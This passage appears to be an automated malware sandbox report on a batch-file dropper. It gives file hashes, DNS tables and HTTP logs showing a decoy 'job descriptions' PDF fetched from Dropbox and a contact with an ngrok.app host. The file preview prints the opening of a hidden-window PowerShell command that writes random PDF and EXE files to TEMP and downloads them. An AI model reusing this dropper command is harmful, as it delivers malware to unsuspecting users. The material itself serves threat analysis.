oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	61147
Entropy (8bit):	5.077943793919534
Encrypted:	false
SSDEEP:	1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
MD5:	95B7548D8D8DDBAB0877BFC7F500503D
SHA1:	894B9735A30AE067FF88622B4F9C8EDF36997F6F
SHA-256:	D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
SHA-512:	B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
Malicious:	false
Preview:	PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

File type:	DOS batch file, ASCII text, with very long lines (829), with CRLF line terminators
Entropy (8bit):	5.625521364971686
TrID:
File name:	122046760.bat
File size:	846 bytes
MD5:	436f3ea86f14441069bcc1e311628357
SHA1:	8b8b465e85703f79d75170ab565aef8d45abf368
SHA256:	4bd2223d18e26d1705b9a8033160554a91455354746ebc6aa19970bfd21a95d6
SHA512:	4076128cd7c6d21796f0d06b0ae3579cf1412e2569cf8472fa864e19c2eedd4b1f816b0ce0cf0bc08e7b3541b622f1406d02766461141b44d1cec113d1cfde34
SSDEEP:	12:0G89YrII4wvt/ZTt5AfSZ3vG3JkKVd8blK8/1MnzPWFrNG3JkkLMALzI2Z1Mngf4:0G/j59O3J3VO2qtE3JIIwg+35PFD
TLSH:	850112A7327D57A6AAF80EAA2063D2D1CF87BD0C865E39ED750C100194462A63E9A705
File Content Preview:	@echo off..powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -U

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 12:14:03.913223982 CET	192.168.2.4	1.1.1.1	0xea21	Standard query (0)	www.dropbox.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:06.757736921 CET	192.168.2.4	1.1.1.1	0x45a6	Standard query (0)	uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:15.064735889 CET	192.168.2.4	1.1.1.1	0xec6b	Standard query (0)	uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:19.719335079 CET	192.168.2.4	1.1.1.1	0x34aa	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:19.719521046 CET	192.168.2.4	1.1.1.1	0xdc8	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Dec 17, 2024 12:14:20.227646112 CET	192.168.2.4	1.1.1.1	0x733e	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.227844954 CET	192.168.2.4	1.1.1.1	0xe23d	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Dec 17, 2024 12:14:20.228172064 CET	192.168.2.4	1.1.1.1	0xf0ba	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.230268002 CET	192.168.2.4	1.1.1.1	0xafee	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 17, 2024 12:14:20.231941938 CET	192.168.2.4	1.1.1.1	0xa721	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.232089043 CET	192.168.2.4	1.1.1.1	0x97d8	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 17, 2024 12:14:20.292246103 CET	192.168.2.4	1.1.1.1	0x2e8e	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.292529106 CET	192.168.2.4	1.1.1.1	0xa317	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 17, 2024 12:14:56.263561964 CET	192.168.2.4	1.1.1.1	0xac5b	Standard query (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:53.283010006 CET	192.168.2.4	1.1.1.1	0xba4f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:53.283210993 CET	192.168.2.4	1.1.1.1	0x18df	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 12:14:04.162763119 CET	1.1.1.1	192.168.2.4	0xea21	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:04.162763119 CET	1.1.1.1	192.168.2.4	0xea21	No error (0)	www-env.dropbox-dns.com		162.125.69.18	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:07.000694036 CET	1.1.1.1	192.168.2.4	0x45a6	No error (0)	uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:07.000694036 CET	1.1.1.1	192.168.2.4	0x45a6	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:15.354573011 CET	1.1.1.1	192.168.2.4	0xec6b	No error (0)	uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:15.354573011 CET	1.1.1.1	192.168.2.4	0xec6b	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:19.858429909 CET	1.1.1.1	192.168.2.4	0xdc8	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:20.107326984 CET	1.1.1.1	192.168.2.4	0x34aa	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:20.365674973 CET	1.1.1.1	192.168.2.4	0xe23d	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:20.367573023 CET	1.1.1.1	192.168.2.4	0xafee	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:14:20.367630959 CET	1.1.1.1	192.168.2.4	0xf0ba	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.367630959 CET	1.1.1.1	192.168.2.4	0xf0ba	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.369039059 CET	1.1.1.1	192.168.2.4	0x97d8	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:14:20.369052887 CET	1.1.1.1	192.168.2.4	0xa721	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.369052887 CET	1.1.1.1	192.168.2.4	0xa721	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.429440975 CET	1.1.1.1	192.168.2.4	0x2e8e	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.429440975 CET	1.1.1.1	192.168.2.4	0x2e8e	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:20.430591106 CET	1.1.1.1	192.168.2.4	0xa317	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:14:20.454987049 CET	1.1.1.1	192.168.2.4	0x733e	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:20.454987049 CET	1.1.1.1	192.168.2.4	0x733e	No error (0)	googlehosted.l.googleusercontent.com		142.251.37.33	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:23.746998072 CET	1.1.1.1	192.168.2.4	0xe035	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 12:14:23.746998072 CET	1.1.1.1	192.168.2.4	0xe035	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:56.401205063 CET	1.1.1.1	192.168.2.4	0xac5b	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.122.107	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:56.401205063 CET	1.1.1.1	192.168.2.4	0xac5b	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.115.64	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:56.401205063 CET	1.1.1.1	192.168.2.4	0xac5b	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.115.182	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:56.401205063 CET	1.1.1.1	192.168.2.4	0xac5b	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.98.232	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:14:56.401205063 CET	1.1.1.1	192.168.2.4	0xac5b	No error (0)	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app		3.6.30.85	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:15.703598022 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:15.703598022 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:16.707922935 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:16.707922935 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:17.983421087 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:17.983421087 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:19.622965097 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:19.622965097 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:23.618843079 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:23.618843079 CET	1.1.1.1	192.168.2.4	0x44ee	No error (0)	fg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:53.420476913 CET	1.1.1.1	192.168.2.4	0x18df	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 17, 2024 12:15:53.511589050 CET	1.1.1.1	192.168.2.4	0xba4f	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 12:15:53.511589050 CET	1.1.1.1	192.168.2.4	0xba4f	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:05 UTC	288	OUT	GET /scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com Connection: Keep-Alive
2024-12-17 11:14:06 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com/cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL_CpADxHeK7b0uJDj7dSlrAFmx88FLzRKgx-9qBHs-SNBjRL12BfnojN6YUgdgRA563bhaHP60UgOw94FlDmmp2h5b8RlGiZL-hItTHoDxQXsMp5Bp8DEaxv5fYkU/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MjgwNzc0Mzk1MDI0NzE5MTE5Mjc5NTc1NDA1MjAzNDgyNTY4NzE1; Path=/; Expires=Sun, 16 Dec 2029 11:14:06 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=91NWHkXfVocWJCu0sne65FtI; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:14:06 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=91NWHkXfVocWJCu0sne65FtI; Path=/; Expires=Wed, 17 Dec 2025 11:14:06 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=BRI0w-qz7A; Path=/; Expires=Wed, 17 Dec 2025 11:14:06 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:14:06 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:14:06 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 8cc6f6689f344f54ae249d858a83916c Connection: close
2024-12-17 11:14:06 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:08 UTC	370	OUT	GET /cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL_CpADxHeK7b0uJDj7dSlrAFmx88FLzRKgx-9qBHs-SNBjRL12BfnojN6YUgdgRA563bhaHP60UgOw94FlDmmp2h5b8RlGiZL-hItTHoDxQXsMp5Bp8DEaxv5fYkU/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-17 11:14:09 UTC	863	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="Documents about company information and job descriptions (2).pdf"; filename*=UTF-8''Documents%20about%20company%20information%20and%20job%20descriptions%20%282%29.pdf Content-Security-Policy: sandbox Etag: 1733913980334826d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 140 X-Webkit-Csp: sandbox Date: Tue, 17 Dec 2024 11:14:08 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 656088 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: a9c9555080f34af28e3c9ba13feb7546 Connection: close
2024-12-17 11:14:09 UTC	15521	IN	Data Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1 Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:u
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: 68 92 2e f0 ab 37 a0 22 0a 71 20 88 96 63 31 98 33 b9 2f a6 fa 38 8f 04 3d d4 0b b5 ef 6d e2 5e 95 e3 5d 65 7e ab 25 a3 03 45 0d 7f e8 90 6c 97 39 68 a7 5d f3 dd e0 f8 62 77 23 93 24 36 55 9e 56 52 3e 16 62 ca 11 15 f9 76 5f f4 36 41 41 1b 75 c5 5f 4b f4 4f 92 36 e3 4c 27 4a e4 d7 89 da 24 e2 8b 14 92 13 3b 54 4c a2 3d 9b b4 9b 56 70 94 3b a4 a0 9a 08 ba fa 92 7e 9a 5e fe 84 c6 71 1d 91 0f e6 19 fd 59 f1 36 df 82 1f e2 46 4a be 29 2b 0e 60 bc 93 81 2e 0b 80 9e 3c 57 c4 1c af 36 f6 a5 b3 27 33 a6 1c 38 bd ba 80 5e 5d 30 28 57 28 4b d1 df b8 9a 34 f1 d8 a5 cf b5 e1 32 b6 59 07 e1 ee b0 f4 4c 72 cf 9a c8 4d 0a 5e d6 b7 53 f6 05 40 66 85 fe ff db ff 83 8d 57 dc 4c a4 03 28 e0 c5 af c4 97 55 ea 90 9f 16 67 64 f9 3e 87 a2 0b 33 7e 5b a2 eb 6b 6f 94 6a aa 22 fd Data Ascii: h.7"q c13/8=m^]e~%El9h]bw#$6UVR>bv_6AAu_KO6L'J$;TL=Vp;~^qY6FJ)+`.<W6'38^]0(W(K42YLrM^S@fWL(Ugd>3~[koj"
2024-12-17 11:14:09 UTC	863	IN	Data Raw: 2e 47 34 a6 61 d4 78 6c 1e 7d d2 92 e2 ee d2 35 3d 6e fd 95 98 81 b8 7d 4d bc e0 b5 b3 a1 bf 6c ef ed f5 33 b7 7a 2e 9c 8d 67 31 c0 9e 78 ac 6a bc 47 ec e6 dc ce 0d 42 6a db dc 77 a9 3e f7 cd b1 22 e2 24 09 62 ea c0 b7 58 b3 dc d1 32 7b f8 57 8c dd 8b a7 45 0e e3 f1 a7 f1 b9 f6 70 dc f4 43 13 52 5d cd f6 d3 9f 16 94 91 b4 59 49 95 56 08 c4 da 92 9a 4a 76 2c 78 96 f0 e2 37 76 fb 66 b8 0e 9b 92 88 23 7e 7d e3 e0 64 56 b8 0e 8b 92 78 a8 14 ca 0d 3e 88 9c 82 f4 e9 5b ff f3 b4 2e 98 14 c1 44 ab af 8d 37 25 ac 5e e6 83 5a e7 e9 d1 29 61 d4 b0 b5 77 a3 15 67 9e 88 91 bd b2 7b dc 7e 1c 52 3f e1 4e 06 9b 38 9d 13 3e f3 ce e3 ea 5d 53 7a 1a 2f 49 49 51 23 52 2f f2 46 12 41 c5 3c 8c 47 04 fe a2 fa fa 29 a8 40 cf 88 4b 46 42 de f5 8e 62 da 57 df 75 4d 29 78 fa 74 7f Data Ascii: .G4axl}5=n}Ml3z.g1xjGBjw>"$bX2{WEpCR]YIVJv,x7vf#~}dVx>[.D7%^Z)awg{~R?N8>]Sz/IIQ#R/FA<G)@KFBbWuM)xt
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: fb 01 50 e9 9a 72 e3 97 0c 93 97 19 6e 70 d1 4d 63 57 77 39 c7 56 f3 86 4c f8 1b dd 09 3f 90 a0 27 e7 af c6 07 7b 08 86 69 f2 4d 25 e9 3f b8 4b e1 bc 8d 36 c5 df 47 d4 7e b1 2e 21 66 d0 b1 85 5c e4 1f 3f ee d2 7c 71 9c d6 d8 f1 15 eb f9 e6 66 45 3d 92 ee 0e 17 ac bf 34 1f 71 a1 f5 ce cc 2c 2f c3 4b e5 ca f0 53 27 1f 06 aa 92 e6 f2 3a 6d 46 74 fd f6 0a 9a 21 83 48 f2 da 0e 52 7d 43 ce d7 02 c7 5d cd 65 ed df 58 21 24 77 67 4b 8e cd da 87 64 fa c4 5f 4e 56 38 cb 25 f0 29 be 89 f5 75 df f7 c9 55 f6 4b 8d 23 6f 24 b3 6a e5 7f ca e6 26 d6 f1 9e 1b 36 51 92 55 0b 37 94 5c 7a 40 f9 42 fe 95 7b 7a 10 bb df 9d be 27 ce 17 16 18 b5 50 cd 33 4c 11 b8 ac 5a ad 31 f7 f8 6c e5 55 bb 7e 0d ba aa f3 a6 1b ed ea 04 0b 12 cc 8f 5b 67 33 be 1d a3 8c 80 0c c1 76 f4 9f 92 eb Data Ascii: PrnpMcWw9VL?'{iM%?K6G~.!f\?\|qfE=4q,/KS':mFt!HR}C]eX!$wgKd_NV8%)uUK#o$j&6QU7\z@B{z'P3LZ1lU~[g3v
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: 79 f7 75 5c 75 9b d4 5c 90 37 42 10 38 8a 5b 7e 8f 56 ee 54 47 fa f6 e4 e5 37 9d 8e bd b6 9b 77 26 28 26 e8 c3 6a 68 c6 d7 6e 53 e8 89 71 57 c6 39 35 fe cf b0 c8 50 4a e6 74 e9 2e 98 ee 35 ae 80 ef 37 4a 2c a2 05 79 8a fc 99 04 c6 23 c2 ef a6 3a 75 f0 3a c1 4c 05 29 e4 ed 5f af 8d 3d 3d 9f 7a bf 96 dd d4 47 87 a8 4e 30 49 75 d0 20 1c b7 27 a2 37 ae cf f1 e0 24 aa 34 5f 47 8e 67 0d e8 de 0c 93 81 77 13 ee f5 52 51 08 22 b3 fe 65 6f b3 03 ce 85 a4 0f fe 83 79 9a 06 46 b8 2e 8a 84 f8 70 af e4 38 8d 64 19 60 c2 4c 38 d5 16 d8 20 ce 53 d1 45 2d a1 e0 1c af 9c 97 0b 2c 64 31 ce 82 da 5c de 1b 4d af e4 6f 25 e9 e6 52 96 15 da 49 51 68 41 36 3a c5 ac cf 33 0e 12 9d 6d 15 94 64 a6 d0 3f 11 15 88 9b 19 c4 20 98 92 d8 95 6f 04 d6 d2 cb f1 9a e8 5f 5f dc e7 dc ea cd Data Ascii: yu\u\7B8[~VTG7w&(&jhnSqW95PJt.57J,y#:u:L)_==zGN0Iu '7$4_GgwRQ"eoyF.p8d`L8 SE-,d1\Mo%RIQhA6:3md? o__
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: 07 05 d3 04 be dc fc a7 85 80 05 49 df 00 3f d0 54 8e 84 53 0b 98 dd ff d3 0f 6c 97 d3 97 9b eb 57 41 89 93 40 43 d2 fc 5b 8e 3f 49 12 34 5a b6 06 e6 1b cc e1 f0 7a 9d 41 8f df 3a fd ce 3c 62 fe ec a0 91 a6 d5 6e 09 46 a2 b9 60 fe ef 05 f2 21 91 86 8f a9 7d 30 cd 06 fc 25 dd da 20 a9 80 af fd 4f 01 62 1a 12 74 0f 45 1e a5 3a 60 86 8e b0 77 51 47 5e 25 d2 a7 33 52 c7 2c 43 ca 72 80 e3 0f 75 cf 44 6e 15 f8 50 9f cf 5a 4d 4c 13 7c 8e f3 d2 59 1e 4a d1 92 49 0c fe ca 84 8c e3 17 43 02 16 04 62 be 18 9d 0d 5a 3d ac 85 69 5d 46 56 53 d2 71 ad 9e a6 b3 a5 95 10 63 df b4 ea 3d 24 8a aa 82 85 24 0b 60 04 83 62 43 d5 ad 45 78 46 92 e7 92 b7 49 cc be c7 36 fe 47 b1 9e 31 4a 01 3a 41 82 46 0d d5 d3 19 98 56 32 16 ee 9f 84 3d 1a 22 d0 a5 37 3e 24 ec 4e c9 e9 95 a0 7f Data Ascii: I?TSlWA@C[?I4ZzA:<bnF`!}0% ObtE:`wQG^%3R,CruDnPZML\|YJICbZ=i]FVSqc=$$`bCExFI6G1J:AFV2="7>$N
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: 4f 25 e3 d3 eb a4 0d 9f 7a b7 15 c2 07 07 ad 4e 81 14 64 b2 38 ce cf 24 a1 b1 d2 7a ec ce 19 2b 85 73 67 f7 8c 0f 96 3c 36 ac 99 1e de 09 d5 b7 84 28 a5 73 ea f3 94 5d b5 be 3d bd c1 cb c4 f0 17 c6 20 30 79 05 f7 8e 13 52 09 5a 1f a7 a5 12 98 90 5f df 09 82 e0 d1 fe 29 8d 82 f7 3d 52 46 4c bd 75 fa fb b1 f0 da c0 ba 52 50 45 26 e4 d9 0f 15 1e 3d 77 67 cd 2e 31 4b 05 03 26 33 66 10 0c e1 d6 3a 58 c1 e9 be 00 f6 d4 c9 c4 d5 75 9c 1b 8c 1d 37 b6 cc e4 7a 05 19 b0 6a b3 a0 08 ca 80 20 b7 a9 ca 3a 4d 2a 78 57 61 e9 9f 25 45 88 61 26 2a db 3f 7b b3 b3 74 60 92 77 d6 3f 07 b4 b4 a2 52 23 db c3 fd ae bd 3e 53 59 ff 9b 99 22 d6 0c 0a e8 c2 d5 ba a5 0c 16 3a db 8f ce e8 4d a7 58 7a 06 65 a3 56 63 ec e8 5a 39 f2 3e 3a 7f f3 b8 60 25 b3 76 d2 28 3a 12 08 f8 95 22 b7 Data Ascii: O%zNd8$z+sg<6(s]= 0yRZ_)=RFLuRPE&=wg.1K&3f:Xu7zj :MxWa%Ea&?{t`w?R#>SY":MXzeVcZ9>:`%v(:"
